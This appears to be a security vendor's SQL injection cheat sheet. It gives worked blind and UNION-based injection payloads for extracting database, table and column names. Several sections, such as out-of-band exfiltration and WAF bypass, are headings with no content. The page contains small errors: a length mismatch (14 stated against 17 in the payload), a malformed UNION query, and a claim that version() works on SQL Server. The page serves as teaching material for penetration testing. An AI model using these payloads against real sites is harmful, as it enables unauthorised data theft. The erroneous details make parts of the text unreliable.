SQL Injection Cheat Sheet
A comprehensive guide to SQL Injection vulnerabilities, techniques, and examples. Learn how to exploit different databases and bypass WAF.
Medusa
6 Mins
What is SQL Injection?
SQL Injection is a type of vulnerability that occurs in an application's database when an attacker can insert or "inject" SQL commands into a query. This can allow the attacker to view, manipulate, or delete data in the database. This vulnerability usually happens when an application doesn't properly validate input before passing it into an SQL query.
What is SQL Injection Cheat Sheet?
SQL Injection Cheat Sheet is a resource that provides a compiled set of techniques, examples, and tips on how to exploit SQL Injection vulnerabilities. It is used by both ethical hackers and malicious attackers to understand potential vulnerabilities in an application's database and how they can be exploited.
Detection: Characters that can break a query
Table of Contents
Oracle
PostgreSQL
Microsoft
MySQL
Oracle SQL Injection
Version:
Comment
List Users
List Current Database
List Columns
List Tables
String Concatenation
Time Delay
Conditional Time Delays
BEGIN
DNS Lookup
Microsoft SQL Injection
Version
Comment
List Users
List Current Database
List Column
List Table
String Concatenation
Time Delay
Conditional Time Delays
DNS Lookup
PostgreSQL Injection
Version
Comment
List Users
List Current Database
List Column
List Table
String Concatenation
Time Delay
Conditional Time Delays
DNS Lookup
MySQL Injection
Version
Comment
List Users
List Current Database
List Column
List Table
String Concatenation
Time Delay
Conditional Time Delays
DNS Lookup
Boolean Based Blind SQLi
Blind SQL Injection is an attack that asks true or false questions to a database, interpreting the application's response to retrieve data bit by bit. It's often used when the application shows generic error messages but is still vulnerable to SQL injection.
Retrieving Database
The given query will verify if database has 14 characters.
http://example.com/index.php?id=1' AND (length(database())) = 17 --+
Retrieving Database Name
http://example.com/index.php?id=1' AND (ascii(substr((select database()),1,1))) > 105 --+
If the website doesn't fully load, it indicates that the condition is incorrect. Keep trying with different ASCII values until you obtain the database name.
Retrieving Table Length
' AND (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 4 --+
Retrieving name of table name
' AND (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1) ,1,1))) > 108 --+
Retrieving Column Length
This query will test for string length is equal to 7 or not:
' AND (length((select username from users limit 0,1))) = 7 --+
Retrieving Column Name
This query will test if the first character of the first column name is ascii 101 (e):
' AND (ascii(substr((select username from users limit 0,1) ,1,1))) > 101 --+
Union SQL Injection Attack
Union SQL Injection is a type of SQL Injection attack which uses the UNION SQL operator to combine the results of the original query with results from injected malicious SQL statements. This allows an attacker to extract information from the database. The attacker can use this technique to retrieve data from different database tables that would not normally be accessible through the application.
Identify Number of Columns - ORDER BY clause
http://example.com/index.php?id=1' order by 1-- -
Keep incrementing the number until you get an error indicating that there aren't more columns than the given number.
For example:
http://example.com/index.php?id=1' order by 2-- -
http://example.com/index.php?id=1' order by 3-- -
http://example.com/index.php?id=1' order by 4-- -
Identify column that stores “String”
http://example.com/index.php?id=1' Union Select 'a', null, null, null from dual-- -
If the response contains the string 'a', it indicates that the column correctly reflects our data. If it doesn't, continue trying until you receive the reflected string.
http://example.com/index.php?id=1' Union Select null, 'a', null, null from dual-- -
http://example.com/index.php?id=1' Union Select null, null, 'a', null from dual-- -
http://example.com/index.php?id=1' Union Select null, null, null, 'a' from dual-- -
Once you know which column is reflecting data, try to identify which database it is using through thus query
http://example.com/index.php?id=1' Union Select '1', '2', '3', select version(); from dual-- -
The given SQL injection query will work on MySQL, Microsoft SQL Server, and PostgreSQL databases, as these databases support the UNION SELECT command and the version() function.
If you want to retrieve more information, simply modify the statements in the column.
Out of Band SQLi for different databases
Out of Band SQLi (SQL Injection) is a type of SQL Injection attack where the attacker is able to retrieve data via non-traditional channels, such as DNS or HTTP requests. This method is usually used when the server responses are not very verbose, making it hard to extract data. In essence, Out of Band SQLi takes advantage of the server's ability to make DNS or HTTP requests to deliver data to the attacker.
MySQL
DNS Exfiltration:
HTTP(S) Request Exfiltration:
Microsoft SQL Server
DNS Exfiltration:
HTTP(S) Request Exfiltration: Unfortunately, Microsoft SQL Server does not readily support HTTP(S) request exfiltration.
PostgreSQL
DNS Exfiltration: Unfortunately, PostgreSQL does not readily support DNS exfiltration.
Oracle
DNS Exfiltration:
HTTP(S) Request Exfiltration:
Bypass WAF
A Web Application Firewall (WAF) is a security measure designed to protect web applications by monitoring and filtering HTTP traffic between a web application and the Internet. It uses a set of rules to identify and block potentially harmful traffic, including SQL Injection attacks.
A WAF can protect a web application by inspecting SQL queries sent via HTTP requests. If it identifies a pattern that matches known harmful SQL queries (like those used in SQL Injection attacks), it blocks the request from reaching the application. It's important to note, however, that while a WAF can provide a layer of security, it should not be the sole defense against SQL Injection attacks.
Here are a few examples of SQL injection queries that may help to bypass a Web Application Firewall (WAF):
These queries use various techniques such as comment injection, URL encoding, and special command injection to attempt to bypass the WAF.
Keep reading
API Security
3 minutes
What is API Discovery?
API Discovery helps identify, map, and manage APIs within an organization, ensuring security, performance, and seamless integration across systems.
API Security
5 minutes
Top 10 DAST Tools in 2024
DAST tools secure web apps by identifying vulnerabilities through automated security testing.
API Security
8 minutes
Security Information and Event Management (SIEM)
SIEM aggregates and analyzes security data across an organization to detect, monitor, and respond to potential threats in real time.
Experience enterprise-grade API Security solution